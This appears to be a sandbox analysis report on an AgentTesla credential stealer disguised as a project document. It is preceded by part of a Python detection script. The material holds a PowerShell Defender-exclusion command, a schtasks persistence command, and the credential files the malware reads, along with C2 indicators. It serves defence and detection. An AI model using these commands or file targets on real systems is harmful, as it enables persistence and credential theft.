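    {"parent": SAMPLE, "image": SCHTASKS,
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp"'},
    {"parent": SAMPLE, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,  # admin excluding a vendor install dir
     "cmdline": r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\Vendor\agent"'},
    {"parent": r"C:\Windows\System32\msiexec.exe", "image": SCHTASKS,  # installer-created task
     "cmdline": r'schtasks.exe /Create /TN "Vendor\Update" /XML "C:\Program Files\Vendor\update.xml"'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.cmdline}")
```

Run as-is it prints two high findings for the report's PowerShell and schtasks command lines, one medium for the self-spawn and one medium for the vendor exclusion; the installer-created task produces nothing. In production the same fields come from Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled. The regex on the command line is deliberately simple and misses an encoded command (-EncodedCommand) or a script file, so pair it with the Windows Defender operational log, where Event ID 5007 records every configuration change including new exclusions regardless of how they were made.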

                      Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CO DRAFT Al Zaytounah project.exe.43668b8.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.CO DRAFT Al Zaytounah project.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CO DRAFT Al Zaytounah project.exe.439cad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.CO DRAFT Al Zaytounah project.exe.43668b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.929441130.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.679161124.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.679523087.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6960, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6508, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (x2)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6508, type: MEMORYSTR

                      Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | the same ten unpacked PE files, seven memory dumps and two process memory spaces listed for this signature under Stealing of Sensitive Information above.

                      Mitre Att&ck Matrix

Techniques observed for this sample, grouped by tactic column. The bracketed digits are the per-technique signature-count badges from the matrix, reproduced as extracted; grid cells without a badge (techniques of the standard matrix template not observed here) are omitted.

Initial Access: none observed
Execution: Windows Management Instrumentation [211], Scheduled Task/Job [1]
Persistence: Scheduled Task/Job [1]
Privilege Escalation: Process Injection [12], Scheduled Task/Job [1]
Defense Evasion: Disable or Modify Tools [11], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [2], Software Packing [13], Timestomp [1], Masquerading [1], Virtualization/Sandbox Evasion [131], Process Injection [12]
Credential Access: OS Credential Dumping [2], Input Capture [111], Credentials in Registry [1]
Discovery: File and Directory Discovery [1], System Information Discovery [114], Query Registry [1], Security Software Discovery [311], Process Discovery [2], Virtualization/Sandbox Evasion [131], Application Window Discovery [1], Remote System Discovery [1]
Lateral Movement: none observed
Collection: Archive Collected Data [11], Data from Local System [2], Email Collection [1], Input Capture [111], Clipboard Data [1]
Exfiltration: none observed
Command and Control: Encrypted Channel [1], Non-Standard Port [1], Non-Application Layer Protocol [1], Application Layer Protocol [11]
Network Effects, Remote Service Effects, Impact: none observed

                      Behavior Graph

(The interactive process/signature graph is not reproduced in this text export. Its legend distinguishes: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet.)
                      Screenshots

(Screenshot thumbnails are not reproduced in this text export.)

                      Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
CO DRAFT Al Zaytounah project.exe | 26% | Virustotal | (none)
CO DRAFT Al Zaytounah project.exe | 31% | ReversingLabs | Win32.Trojan.AgentTesla

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\eyjBzJU.exe | 31% | ReversingLabs | Win32.Trojan.AgentTesla

Unpacked PE Files

Source | Detection | Scanner | Label
8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
8.0.CO DRAFT Al Zaytounah project.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
8.0.CO DRAFT Al Zaytounah project.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
8.2.CO DRAFT Al Zaytounah project.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://KXS9NVa7QJoby.org | 0% | Avira URL Cloud | safe
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://CjhhBN.com | 0% | Virustotal | (none)
http://CjhhBN.com | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
https://api.ipify.org%$ | 0% | Avira URL Cloud | safe
https://KXS9NVa7QJoby.org$ | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
server126.web-hosting.com | 198.54.126.165 | true | false | (none) | high

                        URLs from Memory and Binaries

Name | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
https://KXS9NVa7QJoby.org | CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp; 00000008.00000002.931681747.0000000002E9D000.00000004.00000001.sdmp; 00000008.00000002.931660638.0000000002E91000.00000004.00000001.sdmp; 00000008.00000002.931642150.0000000002E89000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://127.0.0.1:HTTP/1.1 | CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://api.ipify.org%GETMozilla/5.0 | CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://CjhhBN.com | CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://DynDns.comDynDNS | CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://server126.web-hosting.com | CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931660638.0000000002E91000.00000004.00000001.sdmp | false | (none) | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp; 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | false | (none) | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | CO DRAFT Al Zaytounah project.exe, 00000000.00000002.683749748.0000000004279000.00000004.00000001.sdmp; 00000008.00000000.678089930.0000000000402000.00000040.00000001.sdmp; 00000008.00000000.678611196.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org%$ | CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://KXS9NVa7QJoby.org$ | CO DRAFT Al Zaytounah project.exe, 00000008.00000002.931138457.0000000002B21000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low

                            Contacted IPs


                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.54.126.165 | server126.web-hosting.com | United States | 22612 | NAMECHEAP-NETUS | false

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:532717
                            Start date:02.12.2021
                            Start time:16:38:23
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 11s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:CO DRAFT Al Zaytounah project.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@9/9@1/1
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 92.122.145.220
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

Time | Type | Description
16:39:19 | API Interceptor | 746x Sleep call for process: CO DRAFT Al Zaytounah project.exe modified
16:39:23 | API Interceptor | 41x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

Match: 198.54.126.165

Associated Sample Name / URL | Detection
NEW shipment 5 x 40'HC Mundra to Yantian china.exe | malicious
statement prfma.exe | malicious
OMANTECH PRODUCTS.exe | malicious
TWO NEW QUOTATION.exe | malicious
GOE2103001 SHPT.exe | malicious
VVw0lC8P5l.exe | malicious
14776260521.pdf.exe | malicious
PO_20211153 Dt-241.exe | malicious
INV-257591_77134027.pdf.exe | malicious
PO 100251 05202021.exe | malicious
7b1371c7_by_Libranalysis.exe | malicious
Purchase Order.exe | malicious
specifications.exe | malicious
cargo details.exe | malicious
Import shipment.exe | malicious
PROJECT SPECIFICATION.exe | malicious
customer request.exe | malicious
Import shipment.exe | malicious
PURCHASE ORDER.exe | malicious
MV BBG WUZHOU.exe | malicious

                                                                    Domains

Match: server126.web-hosting.com

Associated Sample Name / URL | Detection | Context
NEW shipment 5 x 40'HC Mundra to Yantian china.exe | malicious | 198.54.126.165
statement prfma.exe | malicious | 198.54.126.165
OMANTECH PRODUCTS.exe | malicious | 198.54.126.165
TWO NEW QUOTATION.exe | malicious | 198.54.126.165
GOE2103001 SHPT.exe | malicious | 198.54.126.165
VVw0lC8P5l.exe | malicious | 198.54.126.165
14776260521.pdf.exe | malicious | 198.54.126.165
PO_20211153 Dt-241.exe | malicious | 198.54.126.165
INV-257591_77134027.pdf.exe | malicious | 198.54.126.165
PO 100251 05202021.exe | malicious | 198.54.126.165
7b1371c7_by_Libranalysis.exe | malicious | 198.54.126.165
Purchase Order.exe | malicious | 198.54.126.165
specifications.exe | malicious | 198.54.126.165
cargo details.exe | malicious | 198.54.126.165
Import shipment.exe | malicious | 198.54.126.165
PROJECT SPECIFICATION.exe | malicious | 198.54.126.165
customer request.exe | malicious | 198.54.126.165
Import shipment.exe | malicious | 198.54.126.165
PURCHASE ORDER.exe | malicious | 198.54.126.165
MV BBG WUZHOU.exe | malicious | 198.54.126.165

                                                                    ASN

Match: NAMECHEAP-NETUS

Associated Sample Name / URL | Detection | Context
QUOTATION.exe | malicious | 198.54.117.218
ufKi6DmWMQCuEb4.exe | malicious | 198.54.119.251
________.exe | malicious | 198.54.122.60
REQUEST FOR SPECIFICATION.exe | malicious | 198.54.126.102
transferencia r#U00e1pida_____________________________________________________.exe | malicious | 198.54.122.60
Invoice.exe | malicious | 198.54.117.218
TNT Receipt_AWB87993766478.exe | malicious | 63.250.34.171
NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe | malicious | 63.250.34.171
lzJWJgZhPc.exe | malicious | 63.250.34.171
Poh Tiong Trading - products list.exe | malicious | 198.54.117.217
SKM_C01112021.exe | malicious | 198.54.117.210
90888234001.exe | malicious | 63.250.34.171
TZAT0vss4p.exe | malicious | 162.213.251.105
Orden econo-002064.pdf.exe | malicious | 198.54.122.60
DOC209272621615.PDF.exe | malicious | 198.54.117.211
FedEx Shipping documents.exe | malicious | 63.250.34.171
WMHighfield.html | malicious | 198.54.115.249
quotation-linde-tunisia-plc-december-2021.xlsx | malicious | 198.54.117.216
Gracehealthmi.org7X9YCEB6AI.htm | malicious | 162.0.232.224
3F6uSD2qZXHmXb8.exe | malicious | 162.255.119.151

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CO DRAFT Al Zaytounah project.exe.log
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):1310
                                                                    Entropy (8bit):5.345651901398759
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                                                                    MD5:D918C6A765EDB90D2A227FE23A3FEC98
                                                                    SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                                                                    SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                                                                    SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                                                                    Malicious:true
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):22284
                                                                    Entropy (8bit):5.602468410848586
                                                                    Encrypted:false
                                                                    SSDEEP:384:MtCDqfFqTEvVC0MX+RwSBKnAjultI2H7Y9gxSJ3xCT1MabZlbAV75fu5ZBDI+iqE:9TE9C94KACltJTxcQCqfwIV8
                                                                    MD5:ED821277128EEF556CACA25DFB58B59F
                                                                    SHA1:04CA0E63AE5B716690060C55DD07A3AA4CCF7DE2
                                                                    SHA-256:6E780B84A6CDDCAD64CC4D3B3A9D7EA302ADF8D4F1579B9B5658DA31CE9884DA
                                                                    SHA-512:B549CCBD0E85D6FE0EFF1F32A94209764E3645F6D26EF7F362D63E8336D97B42319B2FEC1189D5A7D5B774A10231C3947F765EC19A74A00770ECEB28F123D86C
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview: @...e...........|.......h...t.k.h.....B...I..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2vykftg.4p5.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yroqhmk3.0un.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1594
                                                                    Entropy (8bit):5.142504127961618
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta1Ixvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTFv
                                                                    MD5:7E64CEBCCC0B61131A84549F1F5087E8
                                                                    SHA1:E209BA633386A652BEFF108E1F5B9C17FDE1E249
                                                                    SHA-256:00EFC5A58AF5AA588BE72D3CAC3AF26E70CA071FCFC1297624B29FF11313D9FF
                                                                    SHA-512:AA210809BF843292573E2F661AB8F394FBCB24FCFCACC7D10D9EB3F90AA3715C4B85DC4676732C5C24E02E6B6A1CC62478C05A26028E9A92EEEBB2D7F7ED631B
                                                                    Malicious:true
                                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
                                                                    C:\Users\user\AppData\Roaming\eyjBzJU.exe
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):496640
                                                                    Entropy (8bit):7.757723120728433
                                                                    Encrypted:false
                                                                    SSDEEP:12288:V5Bt/E9PyWvCNaG5W1YBnB4w6jRtOnE0TP+:zcPyWv4aGM1Q4w66E0
                                                                    MD5:80CEC5A926B23B289405700083013293
                                                                    SHA1:FBE4B963E5247B52A42EF7485FC2006A77ECBE3A
                                                                    SHA-256:556B249F8B149348DAEC751C26360CB2CB5ABC61A5F067281E14D771A4817086
                                                                    SHA-512:DB2E3E054B6910982BA8A1758B4B44EA27BDC252380C5D02C8FD8C458F3742C3D415C4BCBC0CDEC8C146633D301A969180B9D9B5E9882FD9F8CA2EF22E9E6638
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 31%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..N...D......*l... ........@.. ....................................@..................................k..O........@...........................k............................................... ............... ..H............text...0L... ...N.................. ..`.rsrc....@.......B...P..............@..@.reloc..............................@..B.................l......H.......@E.../......X...Lt..p............................................0...........(.......s....}.....{....r...p.o......{....r...p.o......s2...}.....(....{...........s....o......(....{...........s....o......(....o....&*....0............{.....+..*.0............{.....+..*&...}....*....(....o5...}......(....o3...}.....(.....*...0..Q..........r...pr...p.{.....{....s.....{....s?...(......(....o....&.(....o............-.*....0..e........(........}......{.....{....s....}......++..
                                                                    C:\Users\user\AppData\Roaming\eyjBzJU.exe:Zone.Identifier
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                    C:\Users\user\AppData\Roaming\zbmzjx2g.c2f\Chrome\Default\Cookies
                                                                    Process:C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.7006690334145785
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                    MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                    SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                    SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                    SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                    Malicious:false
                                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\Documents\20211202\PowerShell_transcript.980108.3s9YWMHG.20211202163922.txt
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5777
                                                                    Entropy (8bit):5.406881529320182
                                                                    Encrypted:false
                                                                    SSDEEP:96:BZqj8NhqDo1ZJZzj8NhqDo1Z5ZHBjZ6j8NhqDo1Z7YRRsZH:k
                                                                    MD5:A1D37B2275124F323B3F760B767B275F
                                                                    SHA1:D3EA0493E7ECCD85431828EEEA42C59B88BA0E2B
                                                                    SHA-256:40CE418CC9819494DB1FDF2E042F8F135B5DAA7A7946C162C2B80961D4A60A2F
